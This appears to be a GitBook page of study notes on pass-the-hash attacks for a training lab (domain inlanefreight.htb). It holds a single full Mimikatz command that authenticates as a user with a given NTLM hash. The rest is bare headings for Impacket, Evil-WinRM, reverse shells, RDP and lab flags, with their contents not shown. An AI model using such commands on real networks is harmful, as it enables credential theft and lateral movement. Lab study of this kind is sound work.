pass the hash !!
// mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit




🪟 PASS-THE-HASH ON WINDOWS
1️⃣ PtH using Mimikatz
2️⃣ PtH with Invoke-TheHash (PowerShell)
Import module:
SMB Command Execution:
WMI Exec Reverse Shell
3️⃣ Reverse Shell Setup (Windows)
Listener:
🐧 PASS-THE-HASH ON LINUX
4️⃣ Impacket PsExec
5️⃣ Impacket wmiexec / smbexec / atexec
6️⃣ NetExec (CrackMapExec successor)
7️⃣ Evil-WinRM (PowerShell Remoting)
🖥️ PASS-THE-HASH WITH RDP
RDP using hash:
⚠️ Required Registry Setting
🔒 UAC (Local Accounts Limitation)
🏁 EXERCISE FLAGS (SUMMARY FOR GITBOOK — OPTIONAL)
Task
Flag
🎯 PASS-THE-HASH ATTACK CHEAT SHEET (for GitBook top section)
Last updated
Was this helpful?
